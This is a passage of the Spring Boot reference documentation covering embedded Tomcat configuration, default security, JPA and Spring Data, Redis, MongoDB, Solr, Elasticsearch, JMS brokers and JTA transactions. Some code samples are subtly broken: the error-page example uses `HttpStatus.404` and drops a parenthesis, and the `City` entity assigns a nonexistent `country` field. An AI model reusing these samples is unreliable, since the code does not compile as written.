servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();\n\t\tfactory.setPort(9000);\n\t\tfactory.setSessionTimeout(10, TimeUnit.MINUTES);\n\t\tfactory.addErrorPages(new ErrorPage(HttpStatus.404, \"\/notfound.html\");\n\t\treturn factory;\n\t}\n----\n\nSetters are provided for many configuration options. Several protected method\n'`hooks`' are also provided should you need to do something more exotic. See the\nsource code documentation for details.\n\n\n\n[[boot-features-jsp-limitations]]\n==== JSP limitations\nWhen running a Spring Boot application that uses an embedded servlet container (and is\npackaged as an executable archive), there are some limitations in the JSP support.\n\n* With Tomcat it should work if you use war packaging, i.e. an executable war will work,\n and will also be deployable to a standard container (not limited to, but including\n Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.\n\n* Jetty does not currently work as an embedded container with JSPs.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-web-jsp[JSP sample] so\nyou can see how to set things up.\n\n\n\n[[boot-features-security]]\n== Security\nIf Spring Security is on the classpath then web applications will be secure by default\nwith '`basic`' authentication on all HTTP endpoints. 
To add method-level security to a web\napplication you can also add `@EnableGlobalMethodSecurity` with your desired settings.\nAdditional information can be found in the {spring-security-reference}#jc-method[Spring\nSecurity Reference].\n\nThe default `AuthenticationManager` has a single user ('`user`' username and random\npassword, printed at INFO level when the application starts up)\n\n[indent=0]\n----\n\tUsing default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35\n----\n\nYou can change the password by providing a `security.user.password`. This and other\nuseful properties are externalized via\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\n(properties prefix \"security\").\n\nThe default security configuration is implemented in `SecurityAutoConfiguration` and in\nthe classes imported from there (`SpringBootWebSecurityConfiguration` for web security\nand `AuthenticationManagerConfiguration` for authentication configuration which is also\nrelevant in non-web applications). To switch off the Boot default configuration\ncompletely in a web application you can add a bean with `@EnableWebSecurity`. To customize\nit you normally use external properties and beans of type `WebConfigurerAdapter` (e.g. to\nadd form-based login). There are several secure applications in the\n{github-code}\/spring-boot-samples\/[Spring Boot samples] to get you started with common\nuse cases.\n\nThe basic features you get out of the box in a web application are:\n\n* An `AuthenticationManager` bean with in-memory store and a single user (see\n `SecurityProperties.User` for the properties of the user).\n* Ignored (unsecure) paths for common static resource locations (`+\/css\/**+`, `+\/js\/**+`,\n `+\/images\/**+` and `+**\/favicon.ico+`).\n* HTTP Basic security for all other endpoints.\n* Security events published to Spring's `ApplicationEventPublisher` (successful and\n unsuccessful authentication and access denied).\n* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are\n on by default.\n\nAll of the above can be switched on and off or modified using external properties\n(`+security.*+`). To override the access rules without changing any other autoconfigured\nfeatures add a `@Bean` of type `WebConfigurerAdapter` with\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.\n\nIf the Actuator is also in use, you will find:\n\n* The management endpoints are secure even if the application endpoints are unsecure.\n* Security events are transformed into `AuditEvents` and published to the `AuditService`.\n* The default user will have the `ADMIN` role as well as the `USER` role.\n\nThe Actuator security features can be modified using external properties\n(`+management.security.*+`). To override the application access rules\nadd a `@Bean` of type `WebConfigurerAdapter` and use\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override\nthe actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`\nif you _do_ want to override the actuator access rules.\n\n\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases. From\ndirect JDBC access using `JdbcTemplate` to complete '`object relational mapping`'\ntechnologies such as Hibernate. 
Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The '`How-to`' section includes a '<<howto.adoc#howto-database-initialization, section\non how to initialize a database>>'\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't\nneed to provide any connection URLs, simply include a build dependency to the\nembedded database that you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== Connection to a production database\nProduction database connections can also be auto-configured using a pooling\n`DataSource`. Here's the algorithm for choosing a specific implementation.\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* If HikariCP is available we will use it\n* If Commons DBCP is available we will use it, but we don't recommend it in production.\n* Lastly, if Commons DBCP2 is available we will use it\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n'`starter POMs`' you will automcatically get a dependency to `tomcat-jdbc`.\n\nNOTE: Additional connection pools can always be configured manually. If you define your\nown `DataSource` bean, auto-configuration will not occur.\n\nDataSource configuration is controlled by external configuration properties in\n`+spring.datasource.*+`. For example, you might declare the following section\nin `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options.\n\nTIP: You often won't need to specify the `driver-class-name` since Spring boot can deduce\nit for most databases from the `url`.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything. I.e. 
if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n\n\n\n[[boot-features-connecting-to-a-jndi-datasource]]\n==== Connection to a JNDI DataSource\nIf you are deploying your Spring Boot application to an Application Server you might want\nto configure and manage your DataSource using you Application Servers built in features\nand access it using JNDI.\n\nThe `spring.datasource.jndi-name` property can be used as an alternative to the\n`spring.datasource.url`, `spring.datasource.username` and `spring.datasource.password`\nproperties to access the `DataSource` from a specific JNDI location. For example, the\nfollowing section in `application.properties` shows how you can access a JBoss AS defined\n`DataSource`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.jndi-name=java:jboss\/datasources\/customers\n----\n\n\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can `@Autowire` them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and '`Spring Data`'\nThe Java Persistence API is a standard technology that allows you to '`map`' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to easily implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/['`Accessing Data with JPA`'] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA '`Entity`' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead '`Entity Scanning`' is used. By\ndefault all packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... 
additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation.\nSee the '<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>'\nhow-to.\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities\nin a given state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces. If you are using\nauto-configuration, repositories will be searched from the package containing your\nmain configuration class (the one annotated with `@EnableAutoConfiguration`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default JPA database will be automatically created *only* if you use an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`+spring.jpa.*+` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`.\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `+spring.jpa.properties.*+` (the prefix is stripped before adding them\nto the entity manager). Example:\n\n[indent=0]\n----\n\tspring.jpa.properties.hibernate.globally_quoted_identifiers=true\n----\n\npasses `hibernate.globally_quoted_identifiers` to the Hibernate entity manager.\n\nBy default the DDL execution (or validation) is deferred until\nthe `ApplicationContext` has started. 
There is also a `spring.jpa.generate-ddl` flag, but\nit is not used if Hibernate autoconfig is active because the `ddl-auto`\nsettings are more fine grained.\n\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nGemfire; you can make use of the other projects, but you will need to configure them\nyourself. Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the https:\/\/github.com\/xetorthio\/jedis\/[Jedis]\nclient library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There is a\n`spring-boot-starter-redis` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (except in the case of `RedisTemplate` the exclusion is based on the bean name\n'`redisTemplate`' not its type). If `commons-pool2` is on the classpath you will get a\npooled connection factory by default.\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the The\n`spring-boot-starter-data-mongodb` '`Starter POM`'.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `com.mongodb.Mongo` instance as you would any other\nSpring Bean. By default the instance will attempt to connect to a MongoDB server using\nthe URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport com.mongodb.Mongo;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final Mongo mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(Mongo mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can set `spring.data.mongodb.uri` property to change the `url`, or alternatively\nspecify a `host`\/`port`. 
For example, you might declare the following in your\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. You\ncould simply delete this line from the sample above.\n\nYou can also declare your own `Mongo` `@Bean` if you want to take complete control of\nestablishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a {spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`]\nclass that is very similar in its design to Spring's `JdbcTemplate`. As with\n`JdbcTemplate` Spring Boot auto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now a Mongo data class rather than a JPA `@Entity`, it will work in the\nsame way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the http:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire]\ndata management platform. There is a `spring-boot-starter-data-gemfire` '`Starter POM`'\nfor collecting the dependencies in a convenient way. There is currently no auto=config\nsupport for Gemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the solr client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. 
There is\na `spring-boot-starter-data-solr` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nBean. By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elasticsearch] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nElasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. a `TransportClient`) by setting\n`spring.data.elasticsearch.clusterNodes` to a comma-separated '`host:port`' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. 
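\n\nA minimal repository might look like the following sketch (it assumes a `City` class that\nis mapped with Spring Data Elasticsearch's `@Document` annotation):\n\n[source,java,indent=0]\n----\n\timport org.springframework.data.elasticsearch.repository.ElasticsearchRepository;\n\n\tpublic interface CityRepository extends ElasticsearchRepository<City, String> {\n\n\t\tCity findByName(String name);\n\n\t}\n----\n\n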
As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. Spring AMQP provides a similar feature set for the\n'`Advanced Message Queuing Protocol`' and Boot also provides auto-configuration options\nfor `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging natively\nin Spring WebSocket, and Spring Boot supports that through starters and a small\namount of auto-configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher-level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details). Spring Boot also auto-configures the necessary infrastructure\nto send and receive messages.\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available on the classpath), and `native` to\nconnect to a broker using the `netty` transport protocol. When the latter is\nconfigured, Spring Boot configures a `ConnectionFactory` connecting to a broker running\non the local machine with the default settings.\n\nNOTE: If you are using `spring-boot-starter-hornetq`, the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`+spring.hornetq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can choose whether you want to enable persistence, and the list\nof destinations that should be made available. 
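\n\nFor instance, an embedded broker with persistence enabled and two queues created at startup\nmight be declared as in the following sketch (see `HornetQProperties` for the supported\nproperty names; the queue names here are hypothetical):\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=embedded\n\tspring.hornetq.embedded.persistent=true\n\tspring.hornetq.embedded.queues=inboundQueue,outboundQueue\n----\n\n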
The destinations can be specified as a comma-separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee {sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all, and destinations are resolved against their names,\neither using the '`name`' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`+spring.activemq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-jms-jndi]]\n==== Using a JNDI ConnectionFactory\nIf you are running your application in an application server, Spring Boot will attempt to\nlocate a JMS `ConnectionFactory` using JNDI. By default the locations `java:\/JmsXA` and\n`java:\/XAConnectionFactory` will be checked. You can use the\n`spring.jms.jndi-name` property if you need to specify an alternative location:\n\n[source,properties,indent=0]\n----\n\tspring.jms.jndi-name=java:\/MyConnectionFactory\n----\n\n\n\n[[boot-features-using-jms-template]]\n[[boot-features-using-jms-sending]]\n==== Sending a message\nSpring's `JmsTemplate` is auto-configured and you can autowire it directly into your\nown beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-javadoc}\/jms\/core\/JmsMessagingTemplate.{dc-ext}[`JmsMessagingTemplate`]\n(new in Spring 4.1) can be injected in a similar manner.\n\n\n\n[[boot-features-using-jms-receiving]]\n==== Receiving a message\n\nWhen the JMS infrastructure is present, any bean can be annotated with `@JmsListener` to\ncreate a listener endpoint. If no `JmsListenerContainerFactory` has been defined, a default\none is configured automatically.\n\nThe following component creates a listener endpoint on the `someQueue` destination:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@JmsListener(destination = \"someQueue\")\n\t\tpublic void processMessage(String content) { ... 
}\n\n\t}\n----\n\nCheck {spring-javadoc}\/jms\/annotation\/EnableJms.{dc-ext}[the javadoc of `@EnableJms`]\nfor more details.\n\n[[boot-features-jta]]\n== Distributed Transactions with JTA\nSpring Boot supports distributed JTA transactions across multiple XA resources using\neither an http:\/\/www.atomikos.com\/[Atomikos] or\nhttp:\/\/docs.codehaus.org\/display\/BTM\/Home[Bitronix] embedded transaction manager. JTA\ntransactions are also supported when deploying to a suitable Java EE Application Server.\n\nWhen a JTA environment is detected, Spring's `JtaTransactionManager` will be used to manage\ntransactions. Auto-configured JMS, DataSource and JPA beans will be upgraded to support\nXA transactions. You can use standard Spring idioms such as `@Transactional` to\nparticipate in a distributed transaction.\n\n\n\n=== Using an Atomikos transaction manager\nAtomikos is a popular open source transaction manager which can be embedded into your\nSpring Boot application. You can use the `spring-boot-starter-jta-atomikos` Starter POM to\npull in the appropriate Atomikos libraries. Spring Boot will auto-configure Atomikos and\nensure that appropriate `depends-on` settings are applied to your Spring Beans for correct\nstartup and shutdown ordering.\n\nBy default Atomikos transaction logs will be written to a `transaction-logs` folder in\nyour application home directory (the directory in which your application jar file\nresides). You can customize this directory by setting a `spring.jta.log-dir` property in\nyour `application.properties` file. Properties starting with `spring.jta.` can also be used to\ncustomize the Atomikos `UserTransactionServiceImp`. See the\n{dc-spring-boot}\/jta\/atomikos\/AtomikosProperties.{dc-ext}[`AtomikosProperties` javadoc]\nfor complete details.\n\n\n\n=== Using a Bitronix transaction manager\nBitronix is another popular open source JTA transaction manager implementation. You can\nuse the `spring-boot-starter-jta-bitronix` starter POM to add the appropriate Bitronix\ndependencies to your project. As with Atomikos, Spring Boot will automatically configure\nBitronix and post-process your beans to ensure that startup and shutdown ordering is\ncorrect.\n\nBy default Bitronix transaction log files (`part1.btm` and `part2.btm`) will be written to\na `transaction-logs` folder in your application home directory. You can customize this\ndirectory by using the `spring.jta.log-dir` property. Properties starting with `spring.jta.`\nare also bound to the `bitronix.tm.Configuration` bean, allowing for complete\ncustomization. See the http:\/\/btm.codehaus.org\/api\/2.0.1\/bitronix\/tm\/Configuration.html[Bitronix\ndocumentation] for details.\n\n\n\n=== Using a Java EE managed transaction manager\nIf you are packaging your Spring Boot application as a `war` or `ear` file and deploying\nit to a Java EE application server, you can use your application server's built-in\ntransaction manager. Spring Boot will attempt to auto-configure a transaction manager by\nlooking at common JNDI locations (`java:comp\/UserTransaction`,\n`java:comp\/TransactionManager`, etc.). If you are using a transaction service provided by\nyour application server, you will generally also want to ensure that all resources are\nmanaged by the server and exposed over JNDI. 
